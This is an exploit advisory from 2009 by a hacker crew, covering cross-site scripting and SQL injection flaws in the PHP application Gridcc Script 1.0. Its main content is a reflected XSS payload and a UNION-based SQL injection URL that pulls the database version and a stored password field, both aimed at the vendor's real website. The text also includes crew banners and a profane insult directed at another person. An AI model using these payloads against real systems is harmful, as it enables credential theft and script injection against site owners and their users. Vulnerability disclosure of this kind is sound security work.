Gridcc version 1.0 suffers from cross site scripting and remote SQL injection vulnerabilities.
6452e138562f1e242e7a1645ceb6cf7264b2f47bab345a3ea0efd240eb15dbfe
+===================================================================================+
./SEC-R1Z _ __ _ _ _ _ ___ _ _ _ _ __ _ _ _ _ _
/ /_ _ _ _ / _ _\/ _ _ /\ \< |/_ _ _ _ /
\ \_ _ _ _/ /___ / / __ | |) / | | / /
\_ _ _ _/ /___ / / | __ || / | | / /
_______\ \_ _ \ \2_0_0_9 | \ | | / /____
/_ _ _ _ _\ _ _ _/\ _ _ _ / |__|\ __\ |__|/_ _ _ _ _\ R.I.P MichaelJackson !!!!!
+===================================================================================+
[?] ~ Note : sEc-r1z CrEw# r0x !
==============================================================================
[?] Gridcc Script 1.0 (SQL/XSS) Multiple Remote Vulnerabilities
==============================================================================
[?] My home: [ http://sec-r1z.com ]
[?] Script: [ Gridcc Script 1.0 ]
[?] Language: [ PHP ]
[?] Vendor [http://www.gridcc.org/viewnote.php?id=1812]
[?] Founder: [ ./Red-D3v1L ]
[?] Gr44tz to: [ sec-r1z# Crew - Hackteach Team - My L0ve ~A~ ]
[?] Fuck To : [ Zombie_KsA << big big big L4m3r ]
########################################################################
===[ Exploit XSS ]===
[»]Exploit : [Path]/viewnote.php?id=[XSS Vuln]
[»]dem0: http://www.gridcc.org/viewnote.php?id=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E
-------------------------------------------------------------------------------------------------
===[ Exploit SQL Injection ]===
http://www.gridcc.org/viewnote.php?id=-1+union+select+1,2,3,concat%28version%28%29,0x3e,dbpass%29,5,6,7+from+tutos_dbs
==============================================================================
#sEc-r1z.com Str1kEz y0u !